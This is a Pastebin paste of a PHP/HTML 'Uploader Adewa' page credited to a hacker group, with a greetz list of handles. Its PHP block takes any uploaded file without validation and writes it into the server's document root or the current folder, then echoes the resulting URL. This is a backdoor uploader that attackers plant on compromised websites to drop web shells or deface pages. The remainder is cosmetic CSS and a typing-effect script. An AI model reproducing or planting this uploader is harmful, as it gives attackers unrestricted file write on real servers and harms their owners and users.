Adewakun

Uploader Adewa

May 6th, 2018
754
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.35 KB | None | 0 0
  1. <html lang='en-US'><head><title>adewa saja</title>
  2. <a href="https://www.instagram.com/dev19feb/" target="_blank"><h2>Click Here !</h2></a><br>
  3. <style>
  4. body{cursor:url("http:///foro.elhacker.net/elhacker.cur"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
  5. body {
  6. background-color: #000000;
  7. background-image: url(https://i.imgur.com/K0dvwLTr.jpg);
  8. <!--http://www.twitrcover.com/ar/uploads/Al-Quds-Twitter-Header-8534.jpg-->
  9. margin-left: 0px;
  10. margin-top: 0px;
  11. margin-right: 0px;
  12. margin-bottom: 0px;
  13. background-position:right top;
  14. background-repeat:no-repeat;
  15. background-size:110%
  16. }
  17.  
  18.  
  19. .style1 {
  20. font-family: Arial, Helvetica, sans-serif;
  21. font-size: 12px;
  22. }
  23. </style><br><br><br>
  24.  
  25. <br>
  26. <center><?php
  27. echo "<form method='post' enctype='multipart/form-data'>
  28. <input type='file' name='idx_file'>
  29. <input type='submit' name='upload' value='upload'>
  30. </form>";
  31. $root = $_SERVER['DOCUMENT_ROOT'];
  32. $files = $_FILES['idx_file']['name'];
  33. $dest = $root.'/'.$files;
  34. if(isset($_POST['upload'])) {
  35. if(is_writable($root)) {
  36. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  37. $web = "http://".$_SERVER['HTTP_HOST']."/";
  38. echo "Ciee Sukses Uploadnya :* -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  39. } else {
  40. echo "gagal upload root >:(";
  41. }
  42. } else {
  43. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  44. echo "Ciee Sukses Uploadnya :* <b>$files</b> di folder ini";
  45. } else {
  46. echo "gagal upload >:(";
  47. }
  48. }
  49. }
  50. ?>
  51.  
  52. <!DOCTYPE html>
  53. <html>
  54. <title>K.I.T.A</title>
  55. <head>
  56. <link href='https://fonts.googleapis.com/css?family=Architects+Daughter' rel='stylesheet' type='text/css'>
  57. </head>
  58. <body bgcolor="#2b2b2b" link="gray" text="gray">
  59. <center>
  60.  
  61. <script type="text/javascript">
  62. TypingText = function(element, interval, cursor, finishedCallback) {
  63. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  64. this.running = true;
  65. return;
  66. }
  67. this.element = element;
  68. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  69. this.interval = (typeof interval == "undefined" ? 100 : interval);
  70. this.origText = this.element.innerHTML;
  71. this.unparsedOrigText = this.origText;
  72. this.cursor = (cursor ? cursor : "");
  73. this.currentText = "";
  74. this.currentChar = 0;
  75. this.element.typingText = this;
  76. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  77. TypingText.all.push(this);
  78. this.running = false;
  79. this.inTag = false;
  80. this.tagBuffer = "";
  81. this.inHTMLEntity = false;
  82. this.HTMLEntityBuffer = "";
  83. }
  84. TypingText.all = new Array();
  85. TypingText.currentIndex = 0;
  86. TypingText.runAll = function() {
  87. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  88. }
  89. TypingText.prototype.run = function() {
  90. if(this.running) return;
  91. if(typeof this.origText == "undefined") {
  92. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  93. return;
  94. }
  95. if(this.currentText == "") this.element.innerHTML = "";
  96. if(this.currentChar < this.origText.length) {
  97. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  98. this.tagBuffer = "<";
  99. this.inTag = true;
  100. this.currentChar++;
  101. this.run();
  102. return;
  103. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  104. this.tagBuffer += ">";
  105. this.inTag = false;
  106. this.currentText += this.tagBuffer;
  107. this.currentChar++;
  108. this.run();
  109. return;
  110. } else if(this.inTag) {
  111. this.tagBuffer += this.origText.charAt(this.currentChar);
  112. this.currentChar++;
  113. this.run();
  114. return;
  115. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  116. this.HTMLEntityBuffer = "&";
  117. this.inHTMLEntity = true;
  118. this.currentChar++;
  119. this.run();
  120. return;
  121. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  122. this.HTMLEntityBuffer += ";";
  123. this.inHTMLEntity = false;
  124. this.currentText += this.HTMLEntityBuffer;
  125. this.currentChar++;
  126. this.run();
  127. return;
  128. } else if(this.inHTMLEntity) {
  129. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  130. this.currentChar++;
  131. this.run();
  132. return;
  133. } else {
  134. this.currentText += this.origText.charAt(this.currentChar);
  135. }
  136. this.element.innerHTML = this.currentText;
  137. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  138. this.currentChar++;
  139. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  140. } else {
  141. this.currentText = "";
  142. this.currentChar = 0;
  143. this.running = false;
  144. this.finishedCallback();
  145. }
  146. }
  147. </script>
  148. <br><br><br>
  149. <div id="satu">
  150. <br>
  151. <b style="font-size: 40px;">Uploader Adewa</b>
  152. <br>
  153. - use your brain to repair this system<br>
  154. Tatsumi Crew<br>
  155. @2017<br><br>
  156.  
  157. <br><br>
  158. <font size='3px' color='white' face='Courier New'>RESIS-07 - ./Cyber00t - 0x1998 - Setya404 - ACE666X - ZI-SLOW<br>Mr.Adewa - AaR999 - kerens.id - Dayy404 - Himiko</font>
Advertisement
Add Comment
Please, Sign In to add comment